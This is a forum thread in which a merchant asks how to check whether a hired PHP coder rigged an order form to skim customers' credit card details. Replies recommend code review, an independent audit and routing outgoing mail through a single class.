How can I guarantee a PHP Coder I hired didnt create a rigged order form?

How can I guarantee that a PHP coder I hired didnt create a rigged order form that send him my customers C/C details as well.

If the orderm form is rigged will the SSL notify me?

Thanks

No, it wont. The only way to make sure is to read though the source code and see for yourself, or have somebody you really trust do it for you.

If it is only a single file you can probably notice anything weird in the php code. To be sure you should find another coder that you really trust as posted above.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

You should be able to also look thru the processing form as well to see if there is an email address in there that you do not recognize

thanks for the tips

has any one experienced what I am mentiong right here or I am a bit to worried?

You should set up a development policy that he should write a mail class (for example, CEmail), and all the mails should go through this class instead of calling the PHP mail function directly.

Then, do a search on "mail" function and it should only happen in CEmail. For example, it is used in only one function, SendMail() function in CEmail.

Once that's done, everything's easy. You can make that SendMail() to CC: to you, or to write a log.

I really hope you're not going to email credit card details, even to yourself? That to me would be too reckless, since that type of communication is usually not protected good enough, and would give customers a false sense of security that their data is safe.

Besides, there could be many other ways a coder could capture the data, like storing it in a file for later collection, sending it to another web server with a http request, etc.

Anyways, like i said the only way to make sure is to read and understand the source code yourself, every single line, or have someone else do it for you..

As previous comment shave pointed to a solution I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    "Obsolesence is just a lack of imagination."

Originally posted by NyteOwl
    As previous comment shave pointed to a solution I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    it's because there're many pretenders in this world. They sound very nice at first, but turn out to be ....who-khows-what - so, precaution is a good thing.

Re: How can I guarantee a PHP Coder I hired didnt create a rigged order form?

Originally posted by joephill
    How can I guarantee that a PHP coder I hired didnt create a rigged order form that send him my customers C/C details as well.

If the orderm form is rigged will the SSL notify me?

Thanks

You can normally contact another developer or development firm to audit the code. They could point out of the project has an call backs along with any other kind of exploits.

-Mat
    -Mat Sumpter
    Director, Product Engagement
    Penton Media